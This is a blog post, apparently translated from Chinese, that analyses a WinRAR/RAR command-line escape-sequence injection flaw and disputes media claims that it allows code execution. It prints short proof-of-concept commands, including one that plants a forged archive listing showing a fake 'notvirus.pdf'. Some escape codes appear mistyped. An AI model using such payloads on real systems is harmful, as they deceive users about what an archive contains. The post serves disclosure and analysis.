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CVE-2024-33899 WinRAR RAR/UnRAR Escape Sequence Injection Vulnerability

From CVE-2024-33899Foreign garbage editorPolluting the Simplified Chinese Internet 🤡

0x01. Vulnerability Overview

WinRAR contains Escape Sequence Injection vulnerability affecting command-line versions of RAR and UnRAR:

  • Windows CVE-2024–36052
  • Linux/Unix CVE-2024–33899

PoC Testing:

cd /tmp
tar -xzf rarlinux-x64-624.tar.gz
cd rar
./rar a demo.rar readme.txt
printf 'Hello \033(32mTHIS IS GREEN\033(0m\007' | ./rar c demo.rar
./rar l demo.rar

CVE-2024-33899 WinRAR RAR/UnRAR Escape Sequence Injection Vulnerability

The vulnerability is relatively useless, just playing with Escape Sequence Injection, such as forging a compressed file list (the key Payload is \e(8m):

printf 'Archive: demo.rar\nDetails: RAR 5\n\nAttributes      Size       Date   Time   Name\n----------- ---------  ---------- -----  ---------\n-rw-r--r--          7  2024-05-19 16:26  notvirus.pdf\n----------- ---------  ---------- -----  ---------\n                    7                    1\e(8m' | rar c demo.rar

For some environments, DoS can be used. Weaponizing Plain Text: ANSI Escape Sequences as a Forensic Nightmare

0x02. Origin of the story

I saw a push on WeChat public account:

WinRAR vulnerability lets attackers exploit ANSI escape sequences to trick users

By crafting a malicious archive containing these sequences, an attacker can manipulate the displayed output and trick the user into believing they are opening a harmless file such as a PDF or image.

The vulnerability is triggered when a user tries to open a seemingly harmless file in WinRAR due to improper handling of the file extension.

Dushantha said that instead of launching the expected file, WinRAR's ShellExecute function received incorrect parameters and executed a hidden malicious script, such as a batch file (.bat) or a command script (.cmd).

It seems that the impact of WinRAR vulnerability CVE-2023-38831 has been transplanted, and it is said that the vulnerability author Dushantha said it 🤡. Here is a direct translation of the English content:

By crafting malicious archives containing these sequences, attackers can manipulate the displayed output and deceive users into believing they are opening a harmless file, such as a PDF or image.

When a user attempts to open the seemingly benign file from within WinRAR, the vulnerability is triggered due to improper handling of file extensions.

Instead of launching the expected file, WinRAR’s ShellExecute function receives an incorrect parameter and executes a hidden malicious script, such as a batch file (.bat) or command script (.cmd), Dushantha said.

The original blog of the author is also provided, which is simply nonsense.Really ● Foreign garbage editor pollutes the simplified Chinese Internet

0x03. References

  1. ANSI Escape Injection Vulnerability in WinRAR | by Siddharth Dushantha | May, 2024 | Medium

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